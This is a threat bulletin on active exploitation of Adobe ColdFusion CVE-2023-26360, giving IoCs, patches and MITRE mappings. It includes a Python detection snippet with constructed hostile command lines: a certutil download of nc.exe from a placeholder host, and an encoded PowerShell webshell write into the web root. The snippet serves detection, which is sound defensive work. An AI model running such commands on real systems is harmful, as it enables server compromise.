
Update – Adobe ColdFusion vulnerability exploited (21st March 2023 at 15:13 UTC)

Overview

Active exploitation of Adobe ColdFusion vulnerabilities has been detected by cyber security researchers at Rapid7. At the time of writing, the reported instances have not been attributed to the recently reported Adobe ColdFusion vulnerability, tracked as CVE-2023-26360. However, a potential association has not yet been explicitly ruled out.

The timeline of the reported exploitation dates back to January 2023. Investigations indicate that a threat actor deployed webshells via an encoded PowerShell command, redirecting strings into files on the web server to create the webshells.

In addition, the investigation found the ‘certutil.exe’ binary being invoked with the ‘-urlcache’ flag, a technique threat actors use to retrieve files hosted on a remote web server.
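As an added example (not from the bulletin or from Rapid7), the following Python checks process-creation command lines for the two behaviours described above: certutil.exe invoked with -urlcache, and an encoded PowerShell command whose decoded script redirects output into a .cfm file or the ColdFusion web root. The sample command lines are constructed; the download host and webshell body are placeholders.

```python
import base64
import re
from typing import List, Optional

def _encode_ps(script: str) -> str:
    """Encode a script as powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample process-creation command lines, not data from the bulletin. The download
# host is a reserved .invalid name and the webshell body is a placeholder string.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\certutil.exe -urlcache -split -f http://placeholder.invalid/nc.exe C:\Temp\nc.exe",
    "powershell.exe -NoP -W Hidden -enc "
    + _encode_ps(r"echo PLACEHOLDER_WEBSHELL_BODY > C:\ColdFusion2021\cfusion\wwwroot\wow1.cfm"),
    r"C:\Windows\System32\certutil.exe -hashfile C:\Temp\setup.msi SHA256",
    r"powershell.exe -Command Get-ChildItem C:\Temp",
]

CFM_WRITE = re.compile(r">>?\s*\S+\.cfm\b", re.IGNORECASE)          # output redirected into a .cfm file
WEBROOT_WRITE = re.compile(r">>?\s*\S*\\wwwroot\\", re.IGNORECASE)  # output redirected into the CF web root

def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Decode the script carried by -EncodedCommand (or any accepted prefix such as -enc), else None."""
    tokens = cmdline.split()
    if not tokens or ("powershell" not in tokens[0].lower() and "pwsh" not in tokens[0].lower()):
        return None
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-/")
        if flag and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def classify(cmdline: str) -> List[str]:
    """Tag one command line with the behaviours the bulletin describes."""
    findings = []
    lower = cmdline.lower()
    if "certutil" in lower and "-urlcache" in lower:
        findings.append("certutil_urlcache_download")
    script = decode_encoded_powershell(cmdline)
    if script is not None:
        findings.append("encoded_powershell")
        if CFM_WRITE.search(script) or WEBROOT_WRITE.search(script):
            findings.append("possible_webshell_write")
    return findings
```

Feeding real Sysmon Event ID 1 or Security 4688 CommandLine fields through classify() gives a first-pass triage of hosts for the behaviour described above; the decoded script is also what an analyst should review, since the encoded form hides the target path.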

Updated Indicators of Compromise

Network indicators:


File hashes (SHA-256):


File hashes (SHA-1):

– dac7867ee642a65262e153147552befb0b45b036
– 5d95fb365b9d0ceb568bb0c75cb1d70707723f27

File hashes (MD5):

– 1edf1d653deb9001565b5eff3e50824a
– 470797a25a6b21d0a46f82968fd6a184

Files:

– WOW.TXT – ColdFusion WebShell
– wow.txt – ColdFusion WebShell
– www.txt – ColdFusion WebShell
– www.cfm – ColdFusion WebShell
– wow1.cfm – ColdFusion WebShell
– zzz.txt – ColdFusion WebShell
– dncat.exe – DotNetCat
– nc.exe – NetCat

Updated Mitre Methodologies

Tactic:

TA0042 – Resource Development


Target Industry

Indiscriminate, opportunistic targeting.

Overview

Severity Level – Critical: Compromise may result in the loss of confidentiality and integrity of data.

A critical arbitrary code execution security flaw has been disclosed as affecting Adobe ColdFusion. The vulnerability, tracked as CVE-2023-26360 (CVSSv3 score: 8.6), is caused by an Improper Access Control weakness and can be exploited by remote, unauthenticated threat actors in low-complexity attacks. Adobe reported that the vulnerability is currently being exploited in the wild “in very limited attacks”.

The vulnerability has been added by the Cybersecurity and Infrastructure Security Agency (CISA) to its catalogue of security flaws exploited in the wild, and CISA has given Federal Civilian Executive Branch (FCEB) agencies until 5th April 2023 to apply the relevant updates to safeguard their networks against potential threats.

Impact

Successful exploitation of CVE-2023-26360 could enable threat actors to gain arbitrary code execution and arbitrary file system read capabilities on installations running the affected Adobe product versions.

Vulnerability Detection

Adobe has released patches for the affected product versions. Any installation running an earlier update level than the patched release should be considered vulnerable.

Affected Products

– Adobe ColdFusion 2018: Update 15 and earlier
– Adobe ColdFusion 2021: Update 5 and earlier

It should be noted that CVE-2023-26360 also affects Adobe ColdFusion 2016 and ColdFusion 11 installations, neither of which is supported, as both have reached end-of-life (EoL).

Containment, Mitigations & Remediations

It is strongly recommended that administrators apply the following Adobe updates:

– Adobe ColdFusion 2018: Update 16
– Adobe ColdFusion 2021: Update 6

Indicators of Compromise

No specific Indicators of Compromise (IoCs) are available at this time.

Threat Landscape

Adobe occupies a significant portion of the application-development market share. Threat actors generally weigh the probability of success against asset value when deciding which attack surfaces to focus on, so application-development products can emerge as a prime target. Because Adobe products have become an integral aspect of personal and business operations, threat actors will continue to exploit the associated vulnerabilities in an attempt to exfiltrate sensitive data contained therein or to impact associated business operations.

Threat Group

No attribution to specific threat actors or groups has been identified at the time of writing.

Mitre Methodologies

Tactic:

TA0004 – Privilege Escalation

Technique:

T1055.001 – Process Injection: Dynamic-link Library Injection

Common Weakness Enumeration:

CWE-284 – Improper Access Control

Further Information

Adobe Advisory
AttackerKB Vulnerability Profile
